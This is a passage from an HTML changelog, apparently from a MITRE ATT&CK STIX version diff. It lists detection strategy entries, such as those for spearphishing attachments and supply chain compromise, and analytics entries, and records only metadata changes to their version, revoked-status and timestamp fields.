solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.688000+00:00</td></tr></tbody></table></details><hr><h4>[DET0906] Detection of Siemens Project File Format Infection</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22T17:55:10.734Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 17:55:10.734000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:31:24.570Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.390000+00:00</td></tr></tbody></table></details><hr><h4>[DET0781] Detection of Spearphishing Attachment</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.689000+00:00</td></tr></tbody></table></details><hr><h4>[DET0746] Detection of Spoof Reporting Message</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.691000+00:00</td></tr></tbody></table></details><hr><h4>[DET0799] Detection of Standard Application Layer Protocol</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.681000+00:00</td></tr></tbody></table></details><hr><h4>[DET0730] Detection of Supply Chain Compromise</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0793] Detection of System Binary Proxy Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0731] Detection of System Firmware</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0732] Detection of Theft of Operational Information</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0744] Detection of Transient Cyber Asset</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.684000+00:00</td></tr></tbody></table></details><hr><h4>[DET0794] Detection of Unauthorized Command Message</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.694000+00:00</td></tr></tbody></table></details><hr><h4>[DET0902] Detection of Unauthorized Message</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22T14:32:49.664Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-22 14:32:49.664000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24T20:31:37.796Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.391000+00:00</td></tr></tbody></table></details><hr><h4>[DET0791] Detection of User Execution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.696000+00:00</td></tr></tbody></table></details><hr><h4>[DET0724] Detection of Valid Accounts</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.698000+00:00</td></tr></tbody></table></details><hr><h4>[DET0726] Detection of Wireless Compromise</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0743] Detection of Wireless Sniffing</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.690000+00:00</td></tr></tbody></table></details></details><h2>Analytics</h2><h3>enterprise-attack</h3><details><summary>Patches</summary><hr><h4>[AN0551] Analytic 0551</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-03-13 23:17:37.896000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1370] Analytic 1370</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-24 20:33:02.253000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:30:18.381000+00:00</td></tr></tbody></table></details><hr><h4>[AN1371] Analytic 1371</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: 